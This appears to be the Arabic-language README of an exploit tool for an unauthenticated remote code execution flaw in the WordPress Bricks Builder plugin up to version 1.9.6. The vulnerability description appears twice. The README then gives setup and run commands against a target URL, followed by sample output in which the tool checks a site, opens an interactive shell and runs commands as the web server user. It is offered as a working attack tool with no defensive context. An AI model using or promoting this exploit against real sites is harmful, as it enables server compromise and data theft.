
ثغرة تنفيذ تعليمات برمجية عن بعد غير مصادق عليها في منشئ Bricks Builder لووردبريس حتى الإصدار 1.9.6. يقبل نقطة نهاية عرض القالب كود PHP دون مصادقة، مما يسمح بتنفيذ أوامر عشوائية كمستخدم خادم الويب.
ثغرة تنفيذ أوامر عن بُعد بدون مصادقة في WordPress Bricks Builder <= 1.9.6. يقبل نقطة نهاية عرض القالب كود PHP بدون مصادقة، مما يسمح بتنفيذ أوامر عشوائية كمستخدم خادم الويب.
python3 -m venv venv
source venv/bin/activate
python3 -m pip install requests beautifulsoup4 prompt_toolkit
python3 exploit.py -u http://TARGET
مثال:
$ python3 exploit.py -u http://10.10.10.10
[*] Fetching nonce from http://10.10.10.10 ...
[*] Checking if the target is vulnerable...
[+] Target is vulnerable!
[+] Shell opened. Type 'exit' or Ctrl+C to quit.
Shell> id
uid=33(www-data) gid=33(www-data) groups=33(www-data)